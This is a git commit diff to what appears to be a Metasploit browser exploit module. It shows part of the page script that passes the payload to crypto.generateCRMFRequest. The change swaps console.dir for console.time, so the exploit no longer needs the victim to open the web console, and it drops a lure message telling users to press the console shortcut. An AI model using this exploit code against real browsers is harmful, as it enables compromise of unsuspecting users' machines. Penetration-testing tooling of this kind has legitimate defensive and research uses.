No need for web console YESSSS
parent
738a295f0a
commit
694d917acc
|
@ -56,12 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CONTENT', [
|
||||
true,
|
||||
"Content to display inside the HTML <body>.",
|
||||
"An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i))"+
|
||||
" ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
|
||||
])
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -87,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
|
||||
return 5;
|
||||
};
|
||||
console.dir(y);
|
||||
console.time(y);
|
||||
</script>
|
||||
#{datastore['CONTENT']}
|
||||
</body>
|
||||
|
|
Loading…
Reference in New Issue